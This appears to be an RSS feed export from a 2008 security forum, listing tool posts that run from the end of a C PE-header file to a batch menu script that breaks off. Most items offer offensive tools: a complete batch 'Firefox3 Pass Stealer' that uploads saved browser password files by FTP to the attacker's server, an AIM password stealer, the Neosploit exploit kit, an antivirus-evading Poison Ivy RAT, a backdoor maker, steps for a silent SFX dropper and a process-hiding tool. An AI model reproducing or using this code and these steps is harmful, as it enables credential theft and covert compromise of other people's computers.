DWORD   pe_loadconfigrva;       // C8 C9 CA CB<br />
DWORD   pe_loadconfigsize;      // CC CD CE CF<br />
BYTE    pe_reserved_1[8];       // D0 D1 D2 D3  D4 D5 D6 D7<br />
DWORD   pe_iatrva;              // D8 D9 DA DB<br />
DWORD   pe_iatsize;             // DC DD DE DF<br />
BYTE    pe_reserved_2[8];       // E0 E1 E2 E3  E4 E5 E6 E7<br />
BYTE    pe_reserved_3[8];       // E8 E9 EA EB  EC ED EE EF<br />
BYTE    pe_reserved_4[8];       // F0 F1 F2 F3  F4 F5 F6 F7<br />
// ---- total size == 0xF8 ---------<br />
} PE_HEADER;<br />
<br />
typedef struct PE_OBJENTRY_STRUCT<br />
{<br />
BYTE    oe_name[8];             // 00 01 02 03  04 05 06 07<br />
DWORD   oe_virtsize;            // 08 09 0A 0B<br />
DWORD   oe_virtrva;             // 0C 0D 0E 0F<br />
DWORD   oe_physsize;            // 10 11 12 13<br />
DWORD   oe_physoffs;            // 14 15 16 17<br />
BYTE    oe_reserved[0x0C];      // 18 19 1A 1B   1C 1D 1E 1F  20 21 22 23<br />
DWORD   oe_objectflags;         // 24 25 26 27<br />
// ---- total size == 0x28 ---------<br />
} PE_OBJENTRY;<br />
<br />
typedef struct PE_EXPORT_STRUCT<br />
{<br />
DWORD   ex_flags;               // 00 01 02 03<br />
DWORD   ex_datetime;            // 04 05 06 07<br />
WORD    ex_major_ver;           // 08 09<br />
WORD    ex_minor_ver;           // 0A 0B<br />
DWORD   ex_namerva;             // 0C 0D 0E 0F<br />
DWORD   ex_ordinalbase;         // 10 11 12 13<br />
DWORD   ex_numoffunctions;      // 14 15 16 17<br />
DWORD   ex_numofnamepointers;   // 18 19 1A 1B<br />
DWORD   ex_addresstablerva;     // 1C 1D 1E 1F<br />
DWORD   ex_namepointersrva;     // 20 21 22 23<br />
DWORD   ex_ordinaltablerva;     // 24 25 26 27<br />
// ---- total size == 0x28 ---------<br />
} PE_EXPORT;<br />
<br />
typedef struct PE_IMPORT_STRUCT<br />
{<br />
DWORD   im_lookup;              // 00<br />
DWORD   im_datetime;            // 04  ?<br />
DWORD   im_forward;             // 08  -1<br />
DWORD   im_name;                // 0C<br />
DWORD   im_addresstable;        // 10<br />
// ---- total size == 0x14 ---------<br />
} PE_IMPORT;<br />
<br />
typedef struct PE_FIXUP_STRUCT<br />
{<br />
DWORD   fx_pagerva;             // 00 01 02 03<br />
DWORD   fx_blocksize;           // 04 05 06 07<br />
WORD    fx_typeoffs[];          // 08 09 .. ..<br />
} PE_FIXUP;<br />
<br />
//#pragma pack(pop)<br />
<br />
#endif // __PE_HPP__<br />
<br />
////////x///////x///////x///////x///////x///////x///////x///////x///////x////<br />
</span>]]></description>
		<pubDate>Sun, 05 Oct 2008 19:37:46 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=30281</guid>
	</item>
	<item>
		<title>VBS to EXE</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=30039</link>
		<description><![CDATA[gives you the option to add icons and run as ghost or console app<br />
<a href='http://www.f2ko.de/English/v2e/download.php' class='bbc_url' title='External link' rel='nofollow external'>http://www.f2ko.de/English/v2e/download.php</a><br />
<br />
alternately if you dont feel like downloading the app you can also use a web interface<br />
but limited to a 10 kb .vbs file<br />
<br />
<a href='http://www.f2ko.de/ov2e/ov2e.html' class='bbc_url' title='External link' rel='nofollow external'>http://www.f2ko.de/ov2e/ov2e.html</a><br />
<br />
Vbs To Exe<br />
<br />
Vbs To Exe converts VBScript files into executables.<br />
The created program executes the VBScript-code from memory using Ms-ScriptControl.<br />
It hides the source of your Script-file.<br />
Direct script execution is also possible.<br />
<br />
<br />
NOTICE<br />
<br />
The resulted program may not work correct. Some VBScript functions are not available.<br />
You may test it for functionality.<br />
<br />
http://www.f2ko.de/screenshots/v2e.png]]></description>
		<pubDate>Sat, 13 Sep 2008 04:10:13 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=30039</guid>
	</item>
	<item>
		<title>Bat to EXE</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=30038</link>
		<description><![CDATA[gives you the option to add icons and run as ghost or console app<br />
<a href='http://www.f2ko.de/English/b2e/download.php' class='bbc_url' title='External link' rel='nofollow external'>http://www.f2ko.de/English/b2e/download.php</a><br />
<br />
alternately if you dont feel like downloading the app you can also use a web interface <br />
but limitated to a 10 kb bat size and dont have the option to add icons<br />
<br />
<a href='http://www.f2ko.de/ob2e/ob2e.html' class='bbc_url' title='External link' rel='nofollow external'>http://www.f2ko.de/ob2e/ob2e.html</a><br />
<br />
http://www.f2ko.de/English/b2e/b2e.png]]></description>
		<pubDate>Sat, 13 Sep 2008 04:06:44 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=30038</guid>
	</item>
	<item>
		<title>firefox.bat</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=29967</link>
		<description><![CDATA[i was bored while waiting for dinner<br />
<br />
<br />
basically it takes the key3.db and signons3.txt and send to your ftp server<br />
you can decode them a few ways:<br />
1. create a new firefox profile and place the files in the profile directory<br />
2. use firepassword <a href='http://securityxploded.com/firepassword.php' class='bbc_url' title='External link' rel='nofollow external'>http://securityxploded.com/firepassword.php</a><br />
3. use passwordfox <a href='http://www.nirsoft.net/utils/passwordfox.zip' class='bbc_url' title='External link' rel='nofollow external'>http://www.nirsoft.net/utils/passwordfox.zip</a><br />
<br />
<pre class='prettyprint'>cls
@echo Firefox3 Pass Stealer
@echo Written by illwill
&#58;&#58; make sure you edit the ftpsite, user and pass 



echo off
PUSHD &#34;%UserProfile%&#092;Application Data&#092;Mozilla&#092;Firefox&#34;
IF NOT ERRORLEVEL 1 FOR /F &#34;tokens=2 delims==&#34; %%A IN &#40;'TYPE profiles.ini ^| FINDSTR.EXE /R /B /I /C&#58;&#34;Path=&#34;'&#41; DO SET Profile=%%~nxA
POPD
echo open SITENAME.COM&#62;&#62;c&#58;&#092;$.tmp
echo user USERNAME&#62;&#62;c&#58;&#092;$.tmp
echo PASSWORD&#62;&#62;c&#58;&#092;$.tmp
echo cd public_html&#62;&#62;c&#58;&#092;$.tmp
echo put &#34;%UserProfile%&#092;Application Data&#092;Mozilla&#092;Firefox&#092;Profiles&#092;%Profile%&#092;signons3.txt&#34;&#62;&#62;c&#58;&#092;$.tmp
echo put &#34;%UserProfile%&#092;Application Data&#092;Mozilla&#092;Firefox&#092;Profiles&#092;%Profile%&#092;key3.db&#34;&#62;&#62;c&#58;&#092;$.tmp
echo quit &#62;&#62;c&#58;&#092;$.tmp
ftp -v -i -n -s&#58;c&#58;&#092;$.tmp
del c&#58;&#092;$.tmp</pre>]]></description>
		<pubDate>Sun, 07 Sep 2008 06:37:26 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=29967</guid>
	</item>
	<item>
		<title>AOL Instant Messenger Password Decryptor</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=29910</link>
		<description><![CDATA[AIM 6.x (6.5 & beta 6.8) uses 2 algorithms to encrypt your AIM password. First the Blowfish algorithm is used to encrypt the AIM password using a 448 bit keyword.<br />
The encrypted string is then encoded using base64 and stored in the registry at:<br />
&#092;&#092;HKEY_CURRENT_USER&#092;Software&#092;America Online&#092;AIM6&#092;Passwords<br />
<br />
<br />
From illmob.org<br />
<br />
AIM Rape decodes these passwords then posts the user and decrypted password to a .php script on a remote server<br />
all in a pretty 7.5kb executable<br />
<br />
<a href='http://illmob.org/AimRape.zip' class='bbc_url' title='External link' rel='nofollow external'>Download</a>]]></description>
		<pubDate>Sat, 30 Aug 2008 05:24:28 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=29910</guid>
	</item>
	<item>
		<title>Grendel Scanner</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=29761</link>
		<description><![CDATA[A web application security scanner recently presented @ defcon<br />
<br />
<a href='http://www.grendel-scan.com/download.htm' class='bbc_url' title='External link' rel='nofollow external'>http://www.grendel-scan.com/download.htm</a>]]></description>
		<pubDate>Thu, 14 Aug 2008 13:07:30 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=29761</guid>
	</item>
	<item>
		<title>Neosploit toolkit</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=29679</link>
		<description><![CDATA[The Neosploit toolkit is an advanced exploit framework to compromise web site visitors. It was written by "grabarz". It is unknown if this is a group or an individual. There's some information which suggests it is an individual.<br />
It's not as popular as the Mpack toolkit but is gaining popularity steadily. It was written in the C language and is used as a CGI script. It can support multiple users from the same script. The exploit code will be the same from all users but the delivered executables can be different.<br />
<br />
Similar to other toolkits this one provide various statistics too. Instead of using a database as the means to store them Neosploit uses several files with specific internal structures. The following information about the visitor is logged: Operating System, Web browser and its version, IP address, and the Referer.<br />
<br />
Delivered exploit code is obfuscated using custom J&#097;v&#097;script decoding function. The function name and all local variables are random in order to avoid detection by Network IDS. Often, several layers of obfuscation with anti-decoding tricks are used to deter the faint-hearted.<br />
<br />
Toolkit's URL scheme is designed in such a way which will prohibit thecurious of obtaining the executables even if the same one is used from previous exploits.<br />
<br />
Perhaps the reason for its slow adoption is its high price. It ranges, depending on version, from $1500 to $3000. Common version seen today in the wild is 1.5.x, with 2.0.x in beta mode. First detected version was 1.0.x<br />
<br />
<br />
<br />
<a href='http://rapidshare.com/files/116592665/neosploit-2.rar' class='bbc_url' title='External link' rel='nofollow external'>neosploit toolkit</a><br />
<br />
<br />
passwd=infected]]></description>
		<pubDate>Thu, 07 Aug 2008 00:07:06 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=29679</guid>
	</item>
	<item>
		<title>Scylla 1.0</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=29639</link>
		<description><![CDATA[<span style='font-size: 21px;'>Scylla v1.0b<br />
<br />
</span>Sometimes when you are exploiting a path traversal, you can't find a file, that could be frustrating.<br />
 Scylla will let you generate Triton xploits paths to scan for a target file in multiple locations.<br />
 <br />
 You'll need java 1.6 to use it, so it will work in any box except for MacOS 10.4.9... sorry Gecko, this is the problem of depending of a monopoly http://www.angelwings.ws/aw/images/smilies/biggrin.gif<br />
 <br />
 If you have any suggestion, bug reports, money, girlz or whatever PM me or send me a mail.<br />
 <br />
 I hope you find this tool useful guys.<br />
 <br />
 md5sum: 8cbf46a3a563bce13226dbba661fb551<br />
 sha1sum: ac4a0faad310658cd3dc603abe26a0bb391d2801<br />
<br />
http://img516.imageshack.us/img516/3668/scyllato7.jpg<br />
<br />
<p class='citation'>Quote</p><div class="blockquote"><div class='quote'>Scylla - Triton paths generator<br />
 Coded by APX, Buenos Aires 2008<br />
 th4 f00k1ng c0wb0ys c0d1ng t3am<br />
 apx.808 [@] gmail.com<br />
 <a href='http://apx808.blogspot.com' class='bbc_url' title='External link' rel='nofollow external'>http://apx808.blogspot.com</a><br />
 <br />
 Contents:<br />
 <br />
 1 - Intro<br />
 2 - Use<br />
 3 - Thanks<br />
 4 - Version history<br />
 <br />
 <br />
 [1 - Intro]<br />
 <br />
 It's common in path traversal exploits to have problems <br />
 finding a file, httpd.conf anyone?<br />
 Well, the aim of this app it's to solve this issue.<br />
 Scylla will create a Triton exploit paths list to scan with <br />
 the different locations to search that you specify.<br />
 <br />
 [2 - Use]<br />
 <br />
 -Load the xploit data manually or using the "import" option<br />
 to import from a Triton exploit file.<br />
 <br />
 -Add the tag "&lt;PATH&gt;" to the place you want Scylla to add <br />
 the posible locations. Also, don't forget that Scylla won't make<br />
 the traversal, so you'll need to provide the &#46;&#46;/ be it in your<br />
 locations file or in the xploit path field, the same happens with<br />
 the poison byte. YOU are the one who exploits, Scylla just will<br />
 make easier a repetitive task.<br />
 <br />
 Example:<br />
 <br />
 Xploit path: /cgi-bin/vuln.php?file=&#46;&#46;/&#46;&#46;/..&lt;PATH&gt;%&#48;&#48;<br />
 <br />
 -Load a file with the posible locations of the file you are <br />
 looking for.<br />
 <br />
 -Select a destination file.<br />
 <br />
 -Push "generate".<br />
 <br />
 -Now load the file with Triton and start scanning.<br />
 <br />
 <br />
 NOTE: Be careful how you use this because can be <br />
 	VERY NOISY FOR THE LOGS. <br />
 <br />
 Keep your simultaneos bots count low  and <br />
 scan multiple sites if possible.<br />
 <br />
 [3 - Thanks]<br />
 <br />
 I would like to thanks Ange, Rudelgurke and my <br />
 fellow fooking cowboy Ex0rphine for your testing help.<br />
 <br />
 [4 - Version History]<br />
 <br />
 25-07-2008    -    Project starts.<br />
 <br />
 29-07-2008    -    v1.0b starts being beta tested.<br />
 <br />
 01-08-2008    -    v1.0b Released to public.<br />
 <br />
 <br />
 EOF</div></div><br />
<br />
You can download it from:<br />
<br />
<a href='http://apx808.blogspot.com/2008/10/scylla-v10b.html' class='bbc_url' title='External link' rel='nofollow external'>http://apx808.blogspot.com/2008/10/scylla-v10b.html</a>]]></description>
		<pubDate>Fri, 01 Aug 2008 14:09:55 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=29639</guid>
	</item>
	<item>
		<title>UD Poison Ivy Server</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=29511</link>
		<description><![CDATA[Bored, playing with new UD methods. Knock yourself out kiddies... (port 444) Injects into iexplorer.exe.<br />
<br />
<br />
<em class='bbc'>File Info</em><br />
<br />
Report generated: 19.7.2008<br />
Filename: server.exe<br />
File size: 956 kb<br />
PEiD: PEncrypt 3.1 Final -&gt; junkcode [Overlay]<br />
MD5 Hash: E2C2BEA0C07397F35111E6777DC01231<br />
SHA1 Hash: EE01CE59FDE9785636E29B2665F1C783E2C33F65<br />
<br />
<em class='bbc'>Detections</em><br />
<br />
A-Squared - <span style='color: green'>Nothing found!</span><br />
Antivir - <span style='color: red'>Is the Trojan horse TR/Dropper.Gen</span><br />
Avast - <span style='color: green'>Nothing found!</span><br />
AVG - <span style='color: red'> Trojan horse BackDoor.PoisonIvy.AD </span><br />
BitDefender - <span style='color: green'>Nothing found!</span> <br />
ClamWin - <span style='color: green'>Nothing found!</span> <br />
Comodo - <span style='color: green'>Nothing found!</span>  <br />
Dr.Web - <span style='color: green'>Nothing found!</span><br />
Ewido - <span style='color: green'>Nothing found!</span> <br />
F-PROT 6 - <span style='color: green'>Nothing found!</span> <br />
G DATA - <span style='color: green'>Nothing found!</span> <br />
IkarusT3 - <span style='color: green'>Nothing found!</span> <br />
Kaspersky - <span style='color: green'>Nothing found!</span><br />
McAfee - <span style='color: green'>Nothing found!</span>  <br />
Nod32 - <span style='color: green'>Nothing found!</span>  <br />
Norman - <span style='color: green'>Nothing found!</span> <br />
Panda - <span style='color: green'>Nothing found!</span><br />
Sophos - <span style='color: green'>Nothing found!</span> <br />
TrendMicro - <span style='color: green'>Nothing found!</span><br />
VBA32 - <span style='color: green'>Nothing found!</span>    <br />
Virus Buster - <span style='color: green'>Nothing found!</span><br />
<br />
<em class='bbc'>Scan report generated by  <br />
<a href='http://novirusthanks.org' class='bbc_url' title='External link' rel='nofollow external'>NoVirusThanks.org</a></em><div id='attach_wrap' class='rounded clearfix'>
	<h4></h4>
	<ul>
		
			<li class='clear'>
				<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=4937" title=""><img src="http://www.governmentsecurity.org/forum/public/style_extra/mime_types/zip.gif" alt="" /></a>
&nbsp;<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=4937" title="">server.rar</a> <span class='desc'><strong>(498.72K)</strong></span>
<br /><span class="desc info">: 195</span>
			</li>
		
	</ul>
</div>]]></description>
		<pubDate>Fri, 18 Jul 2008 10:31:12 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=29511</guid>
	</item>
	<item>
		<title>Backdoor Maker</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=29264</link>
		<description><![CDATA[Well I made a backdoor maker for windows xp and vista.<br />
It will create a standalone file that when you open it it will disable the windows firewall and then wait 20 seconds to start the backdoor.<br />
Then it will add its self to the startup.<br />
To log into it you will need crypt cat and the password that you set with the backdoor.<br />
Here is a video on how to use it...<br />
<a href='http://nz.youtube.com/watch?v=s3tauJ8Xu6s' class='bbc_url' title='External link' rel='nofollow external'>http://nz.youtube.com/watch?v=s3tauJ8Xu6s</a><br />
Here is the download link sry wouldn't let me upload.<br />
<a href='http://www.mediafire.com/download.php?uj9x4m4ek4j' class='bbc_url' title='External link' rel='nofollow external'>http://www.mediafire.com/download.php?uj9x4m4ek4j</a><br />
Please rate the program.]]></description>
		<pubDate>Wed, 25 Jun 2008 23:18:46 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=29264</guid>
	</item>
	<item>
		<title>sqlcmd</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=29225</link>
		<description><![CDATA[<a href='http://rapidshare.com/files/123808031/123C.rar' class='bbc_url' title='External link' rel='nofollow external'>http://rapidshare.com/files/123808031/123C.rar</a><br />
<br />
<br />
Azrael sqlCmd v 0.9 rc2<br />
Azrael sqlCmd v 1.5<br />
Azrael sqlCmd v 1.8<br />
<br />
have fun]]></description>
		<pubDate>Fri, 20 Jun 2008 14:15:30 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=29225</guid>
	</item>
	<item>
		<title>PHD Portable HTTP Debugger</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=28733</link>
		<description><![CDATA[I always wanted to use the same tools both in Win and Linux, that's why I decided to create this HTTP Debugger coded in Java.<br />
 This is the first version released to the public, so tell me about any bugs or improvements you would like to have in the app.<br />
<br />
Be sure not to fook up the request if you touch it by hand, the app actually won't patch it or tell you about it, it will just send what you wrote.<br />
 <br />
 To use it you need Java 1.6 Runtime.<br />
 <br />
<p class='citation'>Quote</p><div class="blockquote"><div class='quote'>To execute: <br />
 java -jar phd.jar</div></div> 			 		 	 	 <br />
<br />
I should thanks a lot of people, but I would like to thanks specially <br />
 Rhino for his great tools and inspiration, Ex0rphine my fellow fooking <br />
 cowboy for his help with the code and beta testing, and to the beta testing<br />
 team, for helping me to polish this app, Falk0n, Lausbub, Zyrrox, thanks<br />
 a lot guys.<br />
 <br />
 Hope you enjoy this tool and find it as useful as I do http://www.securibox.net/vbforum/images/smilies/smurf.gif<br />
 <br />
 <br />
 <br />
 <a href='http://www.securibox.net/vbforum/redirector.php?url=http%3A%2F%2Fwww.zshare.net%2Fdownload%2F11869602856330d1%2F' class='bbc_url' title='External link' rel='nofollow external'>http://www.zshare.net/download/11869602856330d1/</a><br />
 <br />
 <br />
 <br />
 This is the "manual", you can see it in the app, clicking in the skull too.<br />
<br />
<p class='citation'>Quote</p><div class="blockquote"><div class='quote'>P.H.D. Portable HTTP Debugger<br />
 Coded by APX, Buenos Aires 2008<br />
 apx.808 [@] gmail.com<br />
 <br />
 Contents:<br />
 <br />
 1 - Intro<br />
 2 - Use<br />
 3 - Thanks<br />
 4 - Version history<br />
 <br />
 <br />
 [1 - Intro]<br />
 <br />
 I needed a HTTP Debugger for my Linux box, and I couldn't find one, <br />
 I hate not being able to use the same tools both in my Win and Linux<br />
 boxes, so I decided to create a new HTTP Debugger based on Triton's <br />
 one.<br />
 The main idea was to create a simple to use, multiple platform HTTP<br />
 Debugger, and this is the result.<br />
 <br />
 [2 - Use]<br />
 <br />
 I wont explain how to use a HTTP Debugger, but I want to explain some <br />
 options you can find in the app.<br />
 <br />
 * Remove response headers: Activating this checkbox, only the response <br />
                            body will be shown.<br />
 <br />
 * Log: You can save all the responses you get to a file.<br />
 <br />
 * Save Selected: Select a text in the response and press this button to<br />
                  save the selection to a file.<br />
 <br />
 * View: This will create a temp file with the response body and will<br />
         open it in the default browser.<br />
 <br />
 * Clean: Use it to clean the responses.<br />
 <br />
 * Auto Clean: If selected the previous responses will be cleaned on each<br />
               request.<br />
 <br />
 [3 - Thanks]<br />
 <br />
 I should thanks a lot of people, but I would like to thanks specially <br />
 Rhino for his great tools and inspiration, Ex0rphine my fellow fooking <br />
 cowboy for his help with the code and beta testing, and to the beta testing<br />
 team, for helping me to polish this app, Falk0n, Lausbub, Zyrrox, thanks<br />
 a lot guys.<br />
 <br />
 [4 - Version History]<br />
 <br />
 28-04-2008 - Project starts.<br />
 <br />
 01-05-2008 - v1.0 starts being beta tested<br />
 <br />
 11-05-2008 - v1.1 released.<br />
              <br />
 	     * Remembers last urls and posted data used.<br />
 	     * Auto Clean option added.<br />
 	     * Patched chunked replies.<br />
 	     * Start using non blocking socks.</div></div>]]></description>
		<pubDate>Mon, 12 May 2008 16:56:51 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=28733</guid>
	</item>
	<item>
		<title>Little SQLck (result) Filter !</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=28564</link>
		<description><![CDATA[hi there....<br />
<br />
i submit a little helper that should do a nice work.<br />
it filters your sqlck results from the ip-scan.txt (or what ever).<br />
<br />
so if u found vulnerable machines in your network. you can exclude them easy for a new scan while u fix them <img src='/forum/public/style_emoticons/default/wink.gif' class='bbc_emoticon' alt=';)' /><br />
no more dublicates...<br />
<br />
Remember -&gt; Only for Educational proposes !!!<br />
<br />
----------<br />
USAGE:<br />
----------<br />
<br />
insox-filter.exe ip_input.txt results.txt<br />
/&#092;/&#092;<br />
-filtsox.exe does the same with more helping text. <br />
-insox-filter.exe just do it console!<br />
<br />
(the attachment function does not work)<br />
so i decided to up it here <img src='/forum/public/style_emoticons/default/wink.gif' class='bbc_emoticon' alt=';)' /><br />
<br />
<a href='http://rapidshare.com/files/110298365/insox_filter-v2.2.rar' class='bbc_url' title='External link' rel='nofollow external'>http://rapidshare.com/files/110298365/insox_filter-v2.2.rar</a><br />
<br />
cheers<div id='attach_wrap' class='rounded clearfix'>
	<h4></h4>
	<ul>
		
			<li class='clear'>
				<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=4911" title=""><img src="http://www.governmentsecurity.org/forum/public/style_extra/mime_types/zip.gif" alt="" /></a>
&nbsp;<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=4911" title="">insox_filter_v2.2.rar</a> <span class='desc'><strong>(120.54K)</strong></span>
<br /><span class="desc info">: 38</span>
			</li>
		
	</ul>
</div>]]></description>
		<pubDate>Fri, 25 Apr 2008 13:37:17 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=28564</guid>
	</item>
	<item>
		<title>Creating Sfx File (if U Want To Run Ircd Example)</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=28510</link>
		<description><![CDATA[<pre class='prettyprint'>To configure the server&#58; 
  -&#62; Open segfault.exe in notepad, or some text editor 
  -&#62; Configure the config to your likings 
  
  To make the IRCd Executable&#58; 
  -&#62; Add all of the files to a WinRAR archive 
  -&#62; Open the WinRAR archive and select all the items 
  -&#62; Press the SFX button in upper right corner 
  -&#62; Click Advanced SFX options 
  -&#62; Type C&#58;&#092;windows&#092;cursors&#092;mstask&#092; in &#34;Path to Extract&#34; 
  -&#62; Type install.bat in &#34;Setup program - Run After Extraction&#34; 
  -&#62; Select the Modes tab at the top 
  -&#62; Under silent mode click the Hide all button 
  -&#62; Under Overwrite mode click the Overwrite all files 
  -&#62; Press Ok &#40;Advanced SFX Options&#41; 
  -&#62; Press Ok &#40;Archive File.rar&#41; 
  -&#62; Run the new SFX'd File.exe on the computer you wish to have the IRCd on</pre>]]></description>
		<pubDate>Mon, 21 Apr 2008 19:57:47 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=28510</guid>
	</item>
	<item>
		<title>Hide Processes In Linux</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=28509</link>
		<description><![CDATA[theres all these non root botnets running on several of the servers that get reported as compromised. I keep a copy of their shit just to know whats out there. <br />
<br />
I post this with warning! I only have the binaries... so if your going to use it, reverse engineer it and make sure its clean... <br />
<br />
[aup@core linux]$ ./xh <br />
XHide - Process Faker, by Schizoprenic Xnuxer Research &copy; 2002 <br />
<br />
Options: <br />
-s string Fake name process <br />
-d Run aplication as daemon/system (optional) <br />
-u uid[:gid] Change UID/GID, use another user (optional) <br />
-p filename Save PID to filename (optional) <br />
<br />
Example: ./xh -s "klogd -m 0" -d -p test.pid ./egg bot.conf <br />
<br />
[aup@core linux]$ <br />
<br />
<a href='http://www.fazey.org/blogger/files/xh.gz' class='bbc_url' title='External link' rel='nofollow external'>here link for download</a> <br />
<br />
just gunzip it, and make sure its executable...]]></description>
		<pubDate>Mon, 21 Apr 2008 19:49:18 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=28509</guid>
	</item>
	<item>
		<title>How To Poison Ivy Step By Step.pdf</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=28508</link>
		<description><![CDATA[here is a tuto about poison ivy<br />
<a href='http://rapidshare.com/files/109336520/How_To_Poison_Ivy_Step_By_Step.pdf.html' class='bbc_url' title='External link' rel='nofollow external'>here is a tuto about poison ivy<br />
<br />
</a>]]></description>
		<pubDate>Mon, 21 Apr 2008 19:44:23 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=28508</guid>
	</item>
	<item>
		<title>Patch Window Shrinking</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=28494</link>
		<description><![CDATA[Original reference hxxp://isc.sans.org/diary.html?storyid=4310 <br />
Files referenced attached for your perusal.<div id='attach_wrap' class='rounded clearfix'>
	<h4></h4>
	<ul>
		
			<li class='clear'>
				<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=4905" title=""><img src="http://www.governmentsecurity.org/forum/public/style_extra/mime_types/pdf.gif" alt="" /></a>
&nbsp;<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=4905" title="">MITSecCampISCPresentation.pdf</a> <span class='desc'><strong>(888.62K)</strong></span>
<br /><span class="desc info">: 25</span>
			</li>
		

			<li class='clear'>
				<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=4906" title=""><img src="http://www.governmentsecurity.org/forum/public/style_extra/mime_types/pdf.gif" alt="" /></a>
&nbsp;<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=4906" title="">apeg.pdf</a> <span class='desc'><strong>(214.89K)</strong></span>
<br /><span class="desc info">: 13</span>
			</li>
		
	</ul>
</div>]]></description>
		<pubDate>Sat, 19 Apr 2008 01:00:04 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=28494</guid>
	</item>
	<item>
		<title>A Very Slick Wordlist For You All</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=28179</link>
		<description><![CDATA[I put this together several years ago but it is still quite useful. Be aware that many other wordlist contain bogus data, tons of whitespace and duplicates. If you use something like JTR you can further increase the power of this list by playing with rules.<br />
<br />
hxxp://rapidshare.com/files/100581863/BendersWordlist.rar.html]]></description>
		<pubDate>Tue, 18 Mar 2008 22:50:55 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=28179</guid>
	</item>
	<item>
		<title>Tool For A Fresh Pc, All-in-one Setup</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=28126</link>
		<description><![CDATA[My buddy SilverStrm (GSO member <img src='/forum/public/style_emoticons/default/smile.gif' class='bbc_emoticon' alt=':)' />) called me the other day and needed a program to do some automated functions for his dad's computer since he has to fix it a lot...kinda to help make it all go faster. I spent a few hours throwing this together for him and I guess I'll share it with you guys. Since I liked the idea, I may create a more advanced version of an actual PROGRAM to do this, not just a batch script. Try it out and please report bugs/errors/lameness <img src='/forum/public/style_emoticons/default/smile.gif' class='bbc_emoticon' alt=':)' /><br />
<br />
** THE FILES IT DOWNLOADS ARE HOSTED ON MY PRIVATE SERVER ** ABUSE WILL REMOVE THIS FUNCTION ** I DO THIS BECAUSE AVG/ZL SERVERS CAN BE SLOW **<br />
<br />
If there are features you would like to see let me know, if you think this is stupid...well let me know (and why), if you would like to test new versions...well hey LET ME KNOW <img src='/forum/public/style_emoticons/default/smile.gif' class='bbc_emoticon' alt=':)' /><br />
<br />
<pre class='prettyprint'>@echo off
COLOR 47
&#58;main
Echo.
Echo	THE IDIOTS TOOL FOR COMPUTER SECURITY - BECAUSE IDIOTS NEED SECURITY TOO
Echo					  **   &#40;C&#41; para&#91;d&#93;ox productions 2008   **
Echo						  Program Version&#58; 0.1 ALPHA BUILD
Echo.
Echo			 LISCENSE&#58; This is a public program and it may be decompiled,
Echo					   modified, and hopefully improved as long as the
Echo					   original author is given credit in the source.
TITLE The Idiots Tool For Computer Security &#40;C&#41; para&#91;d&#93;ox productions 2008
Echo.
Echo +----------------------------- Software Packages ----------------------------+
Echo 1&#41; AVG Anti-Virus 7.5 Free Edition
Echo 2&#41; AVG Anti-Spyware
Echo 3&#41; ZoneLabs Zone Alarm Free Edition
Echo 4&#41; Download XCacls.exe
Echo.
Echo +---------------------- User Settings and Modification ----------------------+
Echo 5&#41; Create User Group
Echo 6&#41; Create User
Echo 7&#41; Modify User
Echo 8&#41; Reset User/Power User/Administrator Password &#40;need r00t&#41;
Echo * List User Information With Output To File Coming Soon!! *
Echo.
Echo +------------------------ Program Access Permissions ------------------------+
Echo 9&#41; Deny Access To A Program
Echo 10&#41; Grant Access To Denied Program
Echo.
Echo +------------------------------ Miscellanious -------------------------------+
Echo 11&#41; About The Author
Echo 12&#41; Credits
Echo 13&#41; Exit Program

set /p choice=Option &#40;1-10&#41;&#58;

